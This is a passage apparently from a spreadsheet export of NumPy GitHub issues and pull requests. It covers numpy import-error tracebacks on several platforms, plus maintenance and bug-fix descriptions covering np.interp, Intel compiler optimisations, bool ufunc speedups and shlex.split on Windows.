  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "E:\maya2018\Maya2018\Python\lib\site-packages\numpy\__init__.py", line 1_x000D_
42, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "E:\maya2018\Maya2018\Python\lib\site-packages\numpy\core\__init__.py", l_x000D_
ine 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_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E:\maya2018\Ma_x000D_
ya2018\bin\mayapy.exe),_x000D_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DLL load failed: 找不到指定的模块。_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
_x000D_
&lt;!-- Full error message, if any (starting from line Traceback: ...) --&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
*D:\Python2.7\python2: *_x000D_
Python 2.7.11 (v2.7.11:6d1b6a68f775, Dec  5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)] on win32_x000D_
Numpy1.16.1_x000D_
_x000D_
*E:\maya2018\Maya2018\bin\mayapy*_x000D_
Python 2.7.11 (default, Jul  1 2016, 02:08:48) [MSC v.1900 64 bit (AMD64)] on win32_x000D_
Numpy1.16.1_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
I have tried that put the ./lib into my PATH, but it doesn't work._x000D_
```_x000D_
E:\maya2018\Maya2018\Python\Lib\site-packages\numpy\.libs_x000D_
```_x000D_
_x000D_
### What can I do?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Original error was: DLL load failed【in the python of Maya2018】</t>
  </si>
  <si>
    <t>I do see the numpy package among site packages under lib directory! But it fails to import numpy. Here is the error I get when I try to import numpy on anaconda3: _x000D_
_x000D_
Traceback (most recent call last):_x000D_
_x000D_
  File "&lt;ipython-input-1-0484cd13f94d&gt;", line 1, in &lt;module&gt;_x000D_
    import matplotlib_x000D_
_x000D_
  File "C:\Users\Maryam\AppData\Roaming\Python\Python37\site-packages\matplotlib\__init__.py", line 141, in &lt;module&gt;_x000D_
    from . import cbook, rcsetup_x000D_
_x000D_
  File "C:\Users\Maryam\AppData\Roaming\Python\Python37\site-packages\matplotlib\cbook\__init__.py", line 33, in &lt;module&gt;_x000D_
    import numpy as np_x000D_
_x000D_
  File "C:\Users\Maryam\AppData\Roaming\Python\Python37\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
_x000D_
  File "C:\Users\Maryam\AppData\Roaming\Python\Python37\site-packages\numpy\core\__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
_x000D_
ImportError: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C:\Users\Maryam\Anaconda3\pythonw.exe),_x000D_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No module named 'numpy.core._multiarray_umath'</t>
  </si>
  <si>
    <t xml:space="preserve">Just Installed Anaconda 3 on windows 10 and it fails to import  numpy or matplotlib. </t>
  </si>
  <si>
    <t xml:space="preserve">The pickle module was being imported from numpy.core.numeric. It was_x000D_
defined there in order to use pickle5 when available in Python3 and_x000D_
cpickle in Python2. The numpy.compat module seems a better place for_x000D_
that._x000D_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</si>
  <si>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Move pickle import to numpy.compat</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
When am trying to run the tensorboard in anaconda prompt, I am getting below error. Can somebody help me to recover from it?_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
tensorboard --logdir=logs/_x000D_
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Traceback (most recent call last):_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\numpy\core\__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\numpy\core\multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\numpy\core\overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: DLL load failed: The specified module could not be found._x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\runpy.py", line 193, in _run_module_as_main_x000D_
    "__main__", mod_spec)_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\runpy.py", line 85, in _run_code_x000D_
    exec(code, run_globals)_x000D_
  File "C:\Users\aswk\AppData\Local\Continuum\anaconda3\Scripts\tensorboard.exe\__main__.py", line 5, in &lt;module&gt;_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\tensorboard\main.py", line 45, in &lt;module&gt;_x000D_
    from tensorboard import default_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\tensorboard\default.py", line 34, in &lt;module&gt;_x000D_
    import tensorflow as tf_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\tensorflow\__init__.py", line 24, in &lt;module&gt;_x000D_
    from tensorflow.python import pywrap_tensorflow  # pylint: disable=unused-import_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\tensorflow\python\__init__.py", line 47, in &lt;module&gt;_x000D_
    import numpy as np_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "c:\users\aswk\appdata\local\continuum\anaconda3\lib\site-packages\numpy\core\__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_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c:\users\aswk\appdata\local\continuum\anaconda3\python.exe),_x000D_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DLL load failed: The specified module could not be found._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
(base) C:\Users\aswk\.spyder-py3\python example files\Test_project&gt;conda list numpy_x000D_
 packages in environment at C:\Users\aswk\AppData\Local\Continuum\anaconda3:_x000D_
_x000D_
 Name                    Version                   Build  Channel_x000D_
msgpack-numpy             0.4.3.2                  pypi_0    pypi_x000D_
numpy                     1.16.1                   pypi_0    pypi_x000D_
numpydoc                  0.8.0                    py36_0_x000D_
</t>
  </si>
  <si>
    <t>DLL load failed: The specified module could not be found</t>
  </si>
  <si>
    <t>['29 - Intel/Anaconda', '50 - Duplicate']</t>
  </si>
  <si>
    <t>Numpy 1.9 introduced a new format for np.write_array, version 2,0 which lifts the limit on array size from format version 1,0. At the time a warning was added. Since redhat v6 now ships numpy 1.10 as the oldest version for our supported python versions (numpy 1.7 is still being used with python 27) we can safely remove the warning now._x000D_
_x000D_
Perhaps this should be labelled as a DEP: not a MAINT:, but the original warning was not a deprecation.</t>
  </si>
  <si>
    <t>MAINT: remove warning for pre-1.9 numpy</t>
  </si>
  <si>
    <t xml:space="preserve">`[ci skip]`_x000D_
_x000D_
some not very important edits fixing names etc., got triggered by the left-over word `easy_install`._x000D_
</t>
  </si>
  <si>
    <t>MAINT: minor changes for consistency to site.cfg.example</t>
  </si>
  <si>
    <t>The code path in scalarapi.c which checks dtype on one inheriting_x000D_
from np.void is especially awkward and was completely untested_x000D_
previously. So I am not sure we should even support it at all._x000D_
_x000D_
Closes gh-12982, gh-3614, and gh-12751_x000D_
_x000D_
----_x000D_
_x000D_
Frankly, I am not sure it is actually worth the trouble, but had started on it. The actual error message does not always include the custom message, this seems because the recursion error can also be triggered by the `GetAttr` call (at least when dtype is made a property)._x000D_
_x000D_
If we attack dtypes in any case, I am afraid adding more band-aids will just make things harder in the long run anyway.</t>
  </si>
  <si>
    <t>Reduces the number of warnings to around ~50, still a WIP to see if I can get it down further.~ 15.</t>
  </si>
  <si>
    <t>DOC: reduce warnings when building, and rephrase slightly</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
This is on installing numpy on raspberry pi 3. I used the Noobs latest version and so using Raspbian stretch. Python was already installed, and I think numpy was already included. At the time, I think that import numpy was working well._x000D_
I installed openCV and it didn't work for a while as I had not put some necessary modules, but finally got it to work. So far so good._x000D_
Later I was trying to install matplotlib, and this didn't go very smoothly. I made a number of attempts where the message in the title was already flagged. I finally manage to get the import matplotlib to work, but then numpy stopped importing. Now I cannot import either matplotlib or numpy, despite having uninstalled numpy (pip3 uninstall numpy) and reinstalled:_x000D_
_x000D_
  /home/pi/.local/lib/python3.5/site-packages/numpy/tests/test_warnings.py_x000D_
  /home/pi/.local/lib/python3.5/site-packages/numpy/version.py_x000D_
Proceed (y/n)? y_x000D_
  Successfully uninstalled numpy-1.16.1_x000D_
pi@raspberrypi:~ $ pip3 install numpy_x000D_
Collecting numpy_x000D_
  Using cached https://www.piwheels.org/simple/numpy/numpy-1.16.1-cp35-cp35m-linux_armv7l.whl_x000D_
Installing collected packages: numpy_x000D_
Successfully installed numpy-1.16.1_x000D_
pi@raspberrypi:~ $ _x000D_
_x000D_
Prior to uninstalling numpy, I did try to install without uninstalling, and downloaded the cached file mentioned._x000D_
_x000D_
Now, I cannot import numpy or matplotlib and for both get a similar error and the message telling me to raise this new issue which I am doing now._x000D_
_x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: /home/pi/.local/lib/python3.5/site-packages/numpy/core/_multiarray_umath.cpython-35m-arm-linux-gnueabihf.so: undefined symbol: cblas_sgemm_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;pyshell#0&gt;", line 1, in &lt;module&gt;_x000D_
    import numpy_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: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/usr/bin/python3),_x000D_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/home/pi/.local/lib/python3.5/site-packages/numpy/core/_multiarray_umath.cpython-35m-arm-linux-gnueabihf.so: undefined symbol: cblas_sgemm_x000D_
_x000D_
&gt;&gt;&gt; import matplotlib_x000D_
Traceback (most recent call last):_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: /home/pi/.local/lib/python3.5/site-packages/numpy/core/_multiarray_umath.cpython-35m-arm-linux-gnueabihf.so: undefined symbol: cblas_sgemm_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;pyshell#1&gt;", line 1, in &lt;module&gt;_x000D_
    import matplotlib_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/matplotlib/__init__.py", line 141, in &lt;module&gt;_x000D_
    from . import cbook, rcsetup_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/matplotlib/cbook/__init__.py", line 33, in &lt;module&gt;_x000D_
    import numpy as np_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/home/pi/.local/lib/python3.5/site-packages/numpy/core/__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: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/usr/bin/python3),_x000D_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/home/pi/.local/lib/python3.5/site-packages/numpy/core/_multiarray_umath.cpython-35m-arm-linux-gnueabihf.so: undefined symbol: cblas_sgemm_x000D_
_x000D_
I hope this helps and that it will eventually contribute to making the installation of these two packages easier in the future._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Thomas</t>
  </si>
  <si>
    <t>undefined symbol: cblas_sgemm</t>
  </si>
  <si>
    <t>['31 - Third-party binaries', '57 - Close?']</t>
  </si>
  <si>
    <t>It's possible that the switched order could cause a different result, something that optimizations should not affect._x000D_
This also just deduplicates code, which is a good thing anyway</t>
  </si>
  <si>
    <t>MAINT: Use the same multiplication order in interp for cached and uncached slopes</t>
  </si>
  <si>
    <t>Split from #12978, #12989</t>
  </si>
  <si>
    <t>BUG: Add missing PyErr_NoMemory() for reporting a failed malloc</t>
  </si>
  <si>
    <t>I was trying to deploy a python package in AWS Lambda following the instruction from https://docs.aws.amazon.com/lambda/latest/dg/lambda-python-how-to-create-deployment-package.html. I include numpy as my dependency in my deployment package. However, when I upload my deployment zip file onto lambda. There is always an import error like this:_x000D_
_x000D_
```_x000D_
[ERROR] Runtime.ImportModuleError: Unable to import module 'plotting_function':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/var/lang/bin/python3.7),_x000D_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No module named 'numpy.core._multiarray_umath'_x000D_
```_x000D_
_x000D_
My OS is Mac and my python version is 3.7. I installed numpy by using pip install lumpy --target . from https://docs.aws.amazon.com/lambda/latest/dg/lambda-python-how-to-create-deployment-package.html_x000D_
_x000D_
Can someone help me? Thanks!</t>
  </si>
  <si>
    <t>Error importing numpy in AWS Lambda</t>
  </si>
  <si>
    <t xml:space="preserve">Reduce optimization level on intel compilers to prevent incorrect optimizations for these operators.  Closes #11796._x000D_
_x000D_
**Note**: including a lot of output here from tests / original example since replicating this issue is difficult for maintainers who don't have access to the intel compilers._x000D_
_x000D_
Tests run with this commit:_x000D_
_x000D_
```console_x000D_
$ python runtests.py --tests  numpy.core.tests.test_regression_x000D_
Building, see build.log..._x000D_
Build OK_x000D_
NumPy version 1.17.0.dev0+1993054_x000D_
NumPy relaxed strides checking option: True_x000D_
...................................................................................................................................................... [ 58%]_x000D_
.........................................................................................................                                              [100%]_x000D_
255 passed in 0.60 seconds_x000D_
```_x000D_
_x000D_
And the original example by @stevesimmons seems to work as expected now_x000D_
_x000D_
```console_x000D_
$ python runtests.py --python_x000D_
Building, see build.log..._x000D_
Build OK_x000D_
Enabling display of all warnings_x000D_
Python 3.7.2 (default, Feb 17 2019, 05:40:22) _x000D_
[GCC Intel(R) C++ gcc 6.3 mode] on linux_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
(InteractiveConsole)_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; acc = np.divide.accumulate_x000D_
&gt;&gt;&gt; a = np.ones(8, dtype=np.float64)_x000D_
&gt;&gt;&gt; print(acc(a, out=2*np.ones_like(a)))_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
&gt;&gt;&gt; print(acc(a))_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
&gt;&gt;&gt; print(acc(a))_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
&gt;&gt;&gt; print(acc(a))_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
&gt;&gt;&gt; print(acc(a, out=2*np.ones_like(a)))_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
```_x000D_
_x000D_
If we set that back to 3_x000D_
_x000D_
```diff_x000D_
-    #pragma intel optimization_level 2_x000D_
+    #pragma intel optimization_level 3_x000D_
```_x000D_
then it fails with the original two I experienced_x000D_
_x000D_
```console_x000D_
python runtests.py --tests  numpy.core.tests.test_regression                            _x000D_
Building, see build.log...                                                                                                                                    _x000D_
Build OK                                                                                                                                                      _x000D_
NumPy version 1.17.0.dev0+1993054                                                                                                                             _x000D_
NumPy relaxed strides checking option: True                                                                                                                   _x000D_
..........................................................F.........................F................................................................. [ 58%] _x000D_
.........................................................................................................                                              [100%] _x000D_
========================================================================== FAILURES ==========================================================================_x000D_
______________________________________________________________ TestRegression.test_method_args ________________________________________________________________x000D_
                                                                                                                                                              _x000D_
self = &lt;numpy.core.tests.test_regression.TestRegression object at 0x154900be7198&gt;                                                                             _x000D_
                                                                                                                                                              _x000D_
    def test_method_args(self):                                                                                                                               _x000D_
     # ...._x000D_
&gt;               assert_(abs(res1-res2).max() &lt; 1e-8, func)_x000D_
E               AssertionError: cumsum_x000D_
_x000D_
arr        = array([[0.69183767, 0.56056054, 0.5194162 , 0.5138226 , 0.96845997,_x000D_
        0.26740585, 0.78204654],_x000D_
       [0.4527793...183, 0.39322357],_x000D_
       [0.36166581, 0.53629936, 0.97162809, 0.01306439, 0.57704599,_x000D_
        0.26044573, 0.23755532]])_x000D_
arr2       = array([[0.69183767, 0.56056054, 0.5194162 , 0.5138226 , 0.96845997,_x000D_
        0.26740585, 0.78204654],_x000D_
       [0.4527793...183, 0.39322357],_x000D_
       [0.36166581, 0.53629936, 0.97162809, 0.01306439, 0.57704599,_x000D_
        0.26044573, 0.23755532]])_x000D_
func       = 'cumsum'_x000D_
func_meth  = 'cumsum'_x000D_
funcs1     = ['argmax', 'argmin', 'sum', ('product', 'prod'), ('sometrue', 'any'), ('alltrue', 'all'), ...]_x000D_
funcs2     = ['compress', 'take', 'repeat']_x000D_
res1       = array([0.69183767, 1.25239821, 0.75136076, 1.26518336, 1.13586136,_x000D_
       1.40326721, 1.67526206, 2.12804145, 1.384186...93804  , 0.52497727, 0.88664308,_x000D_
       0.70719416, 1.67882225, 0.30845577, 0.88550176, 1.2054634 ,_x000D_
       1.44301872])_x000D_
res2       = array([0.69183767, 1.25239821, 0.5194162 , 1.0332388 , 0.96845997,_x000D_
       1.23586582, 0.78204654, 1.23482594, 0.751752...6583269, 0.39322357, 0.75488937,_x000D_
       0.53629936, 1.50792745, 0.01306439, 0.59011038, 0.26044573,_x000D_
       0.49800105])_x000D_
self       = &lt;numpy.core.tests.test_regression.TestRegression object at 0x154900be7198&gt;_x000D_
_x000D_
numpy/core/tests/test_regression.py:532: AssertionError_x000D_
____________________________________________________ TestRegression.test_noncommutative_reduce_accumulate _____________________________________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_regression.TestRegression object at 0x154900bb60f0&gt;                                                                            _x000D_
_x000D_
    def test_noncommutative_reduce_accumulate(self):_x000D_
        # ..._x000D_
        todivide = np.array([2.0, 0.5, 0.25])_x000D_
        # ..._x000D_
        assert_array_equal(np.divide.accumulate(todivide),_x000D_
&gt;           np.array([2., 4., 16.]))_x000D_
E       AssertionError: _x000D_
E       Arrays are not equal_x000D_
E       _x000D_
E       Mismatch: 33.3%_x000D_
E       Max absolute difference: 16._x000D_
E       Max relative difference: 1._x000D_
E        x: array([2.e+000, 4.e+000, 4.e-323])_x000D_
E        y: array([ 2.,  4., 16.])_x000D_
_x000D_
self       = &lt;numpy.core.tests.test_regression.TestRegression object at 0x154900bb60f0&gt;                                                                      _x000D_
todivide   = array([2.  , 0.5 , 0.25])_x000D_
tosubtract = array([0, 1, 2, 3, 4])_x000D_
_x000D_
numpy/core/tests/test_regression.py:705: AssertionError_x000D_
2 failed, 253 passed in 0.74 seconds_x000D_
```_x000D_
_x000D_
and the original example is reproduced:_x000D_
_x000D_
```console_x000D_
$ python runtests.py --python_x000D_
Building, see build.log..._x000D_
Build OK_x000D_
Enabling display of all warnings_x000D_
Python 3.7.2 (default, Feb 17 2019, 05:40:22) _x000D_
[GCC Intel(R) C++ gcc 6.3 mode] on linux_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
(InteractiveConsole)_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; acc = np.divide.accumulate_x000D_
&gt;&gt;&gt; a = np.ones(8, dtype=np.float64)_x000D_
&gt;&gt;&gt; print(acc(a, out=2*np.ones_like(a)))_x000D_
[1. 1. 2. 2. 2. 2. 2. 2.]_x000D_
&gt;&gt;&gt; print(acc(a))_x000D_
[1. 1. 1. 1. 2. 2. 2. 2.]_x000D_
&gt;&gt;&gt; print(acc(a))_x000D_
[1. 1. 1. 1. 1. 1. 2. 2.]_x000D_
&gt;&gt;&gt; print(acc(a))_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
&gt;&gt;&gt; print(acc(a, out=2*np.ones_like(a)))_x000D_
[1. 1. 2. 2. 2. 2. 2. 2.]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: Don't allow buggy Intel optimizations for operators + - * /</t>
  </si>
  <si>
    <t>Alternative to gh-12978, using a method that does not need a lot of special cases._x000D_
If we find cases this does not cover, we might want to switch back to the other approach._x000D_
_x000D_
Fixes gh-12951._x000D_
_x000D_
cc @seberg</t>
  </si>
  <si>
    <t>ENH: Correct handling of infinities in np.interp (option B)</t>
  </si>
  <si>
    <t xml:space="preserve">For the following sample code:_x000D_
```python_x000D_
import numpy as np_x000D_
arr = np.full(10**5, 0, bool)_x000D_
_x000D_
for i in range(10000):_x000D_
    np.isnan(arr)_x000D_
_x000D_
```_x000D_
We get the following call graph from `pprof`:_x000D_
![old](https://user-images.githubusercontent.com/440095/52988621-d8722580-33b4-11e9-9aa4-cd619a3f626c.png)_x000D_
_x000D_
This PR eliminates the trip through `npy_half` by providing specialized `npy_bool` implementations of `isnan`, `isinf`, and `isfinite` Given the limited values supported by `npy_bool`, we can trivially specify the result for all inputs. Doing so initially provided a ~20x speedup and now is closer to ~250x:_x000D_
```_x000D_
$ asv compare HEAD^ HEAD -s_x000D_
_x000D_
Benchmarks that have improved:_x000D_
_x000D_
       before           after         ratio_x000D_
     [95db8c28]       [e861372b]_x000D_
     &lt;bool_ufunc~1&gt;       &lt;bool_ufunc&gt;_x000D_
-     1.23±0.01ms      5.03±0.09μs     0.00  bench_ufunc.IsNan.time_isnan('bool')_x000D_
-        65.8±8μs       5.28±0.1μs     0.08  bench_ufunc.IsNan.time_isnan('int16')_x000D_
-      87.9±0.7μs      5.32±0.05μs     0.06  bench_ufunc.IsNan.time_isnan('int32')_x000D_
-         145±1μs      5.40±0.08μs     0.04  bench_ufunc.IsNan.time_isnan('int64')_x000D_
_x000D_
Benchmarks that have stayed the same:_x000D_
_x000D_
       before           after         ratio_x000D_
     [95db8c28]       [e861372b]_x000D_
     &lt;bool_ufunc~1&gt;       &lt;bool_ufunc&gt;_x000D_
        119±0.6μs        118±0.4μs     1.00  bench_ufunc.IsNan.time_isnan('complex128')_x000D_
          240±1μs          243±5μs     1.01  bench_ufunc.IsNan.time_isnan('complex256')_x000D_
          106±1μs        105±0.3μs     0.99  bench_ufunc.IsNan.time_isnan('complex64')_x000D_
         568±10μs          567±6μs     1.00  bench_ufunc.IsNan.time_isnan('float16')_x000D_
         27.4±2μs      27.7±0.08μs     1.01  bench_ufunc.IsNan.time_isnan('float32')_x000D_
       47.3±0.4μs       47.5±0.2μs     1.00  bench_ufunc.IsNan.time_isnan('float64')_x000D_
          141±2μs        141±0.5μs     1.00  bench_ufunc.IsNan.time_isnan('longfloat')_x000D_
```_x000D_
The call graph is also greatly simplified:_x000D_
![fixed](https://user-images.githubusercontent.com/440095/52988888-ebd1c080-33b5-11e9-8707-73e1812888bd.png)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: Create boolean and integer ufuncs for isnan, isinf, and isfinite.</t>
  </si>
  <si>
    <t xml:space="preserve">Issue is observed while runing Candle P1B3 benchmark_x000D_
_x000D_
_x000D_
 File "p1b3_baseline_keras2.py", line 26, in &lt;module&gt;_x000D_
    import p1b3 as benchmark_x000D_
  File "/Pilot1/P1B3/p1b3.py", line 37, in &lt;module&gt;_x000D_
    np.set_printoptions(threshold=np.nan)_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/arrayprint.py", line 246, in set_printoptions_x000D_
    floatmode, legacy)_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/arrayprint.py", line 93, in _make_options_dict_x000D_
    raise ValueError("threshold must be numeric and non-NAN, try "_x000D_
ValueError: threshold must be numeric and non-NAN, try sys.maxsize for untruncated representation_x000D_
</t>
  </si>
  <si>
    <t>ValueError: threshold must be numeric and non-NAN, try sys.maxsize for untruncated representation</t>
  </si>
  <si>
    <t xml:space="preserve">As part of @tylerjereddy's valiant crusade to eliminate `_exec_command`, we introduced some uses of `shlex.split` to maintain compatibility with old string arguments:_x000D_
_x000D_
https://github.com/numpy/numpy/blob/568d0f7483f7b94029d49707ccd6371f9f5c554c/numpy/f2py/__init__.py#L94_x000D_
_x000D_
https://github.com/numpy/numpy/blob/d1186c9d2fdc62fe1491d0820af12106d16a1fb6/numpy/distutils/fcompiler/__init__.py#L478_x000D_
_x000D_
https://github.com/numpy/numpy/blob/d1186c9d2fdc62fe1491d0820af12106d16a1fb6/numpy/distutils/fcompiler/__init__.py#L481_x000D_
_x000D_
Unfortunately, these changes made the false assumption that `shlex.split(args, posix=False)` meant "do it the windows way". This is demonstrably non-true._x000D_
_x000D_
I think we need to make a choice here:_x000D_
_x000D_
* Just require posix-escaping everywhere. Most people using distutils are probably more familiar with it anyway. The biggest pain point is that windows file paths using backslashes will start failing._x000D_
* Implement our own version of shlex.split that works correctly on windows._x000D_
_x000D_
An inefficient but correct implementation would look like:_x000D_
_x000D_
```python_x000D_
import subprocess_x000D_
_x000D_
def shell_split(cmd):_x000D_
    """_x000D_
    Like `shlex.split`, but uses the Windows splitting syntax when run on Windows_x000D_
    """_x000D_
    if os.name == 'posix':_x000D_
        return shlex.split(cmd)_x000D_
    else:_x000D_
        import json_x000D_
_x000D_
        if not cmd:_x000D_
            return []_x000D_
        # Just invoke python which has a builtin parser, rather than trying to roll our own._x000D_
        full_cmd = '{} {}'.format(_x000D_
            subprocess.list2cmdline([_x000D_
                sys.executable, '-c',_x000D_
                'import sys, json; print(json.dumps(sys.argv[1:]))'_x000D_
            ]), cmd_x000D_
        )_x000D_
        ret = subprocess.check_output(full_cmd)_x000D_
        return json.loads(ret.decode())_x000D_
```_x000D_
_x000D_
And an example of how this differs from `shlex.split`:_x000D_
```python_x000D_
&gt;&gt;&gt; flags = '-I/fake/directory "-I/path with/spaces" -Os'_x000D_
&gt;&gt;&gt; shlex.split(flags, posix=False)_x000D_
['-I/fake/directory', '"-I/path with/spaces"', '-Os']_x000D_
&gt;&gt;&gt; shell_split(flags)_x000D_
['-I\\fake\\directory', '-I/path with/spaces', '-Os']_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: Switch to shlex.split(args, posix=False) is backward-incompatible</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>Fixes #12951, according to the proposed handling table posted there.</t>
  </si>
  <si>
    <t>BUG: Correct handling of infinities in np.interp (option A)</t>
  </si>
  <si>
    <t xml:space="preserve">I just installed TensorFlow, Keras in anaconda3. _x000D_
```_x000D_
C:\conda create --name neuralnets python=3.7_x000D_
C:\activate neuralnets_x000D_
_x000D_
(neuralnets) C:\conda install theano_x000D_
(neuralnets) C:\conda install mingw libpython_x000D_
(neuralnets) C:\pip install tensorflow_x000D_
(neuralnets) C:\pip install keras_x000D_
```_x000D_
### Reproducing code example:_x000D_
_x000D_
Executed this command:_x000D_
```_x000D_
(neuralnets) C:\python -c "from keras import backend; print(backend._BACKEND)"_x000D_
```_x000D_
Got the following error:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "C:\Users\Z0035HPP\AppData\Roaming\Python\Python37\site-packages\numpy\core\__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "C:\Users\Z0035HPP\AppData\Roaming\Python\Python37\site-packages\numpy\core\multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "C:\Users\Z0035HPP\AppData\Roaming\Python\Python37\site-packages\numpy\core\overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ModuleNotFoundError: No module named 'numpy.core._multiarray_umath'_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;string&gt;", line 1, in &lt;module&gt;_x000D_
  File "C:\Users\Z0035HPP\AppData\Local\Continuum\anaconda3\envs\neuralnets\lib\site-packages\keras\__init__.py", line 3, in &lt;module&gt;_x000D_
    from . import utils_x000D_
  File "C:\Users\Z0035HPP\AppData\Local\Continuum\anaconda3\envs\neuralnets\lib\site-packages\keras\utils\__init__.py", line 2, in &lt;module&gt;_x000D_
    from . import np_utils_x000D_
  File "C:\Users\Z0035HPP\AppData\Local\Continuum\anaconda3\envs\neuralnets\lib\site-packages\keras\utils\np_utils.py", line 6, in &lt;module&gt;_x000D_
    import numpy as np_x000D_
  File "C:\Users\Z0035HPP\AppData\Roaming\Python\Python37\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "C:\Users\Z0035HPP\AppData\Roaming\Python\Python37\site-packages\numpy\core\__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_
```_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
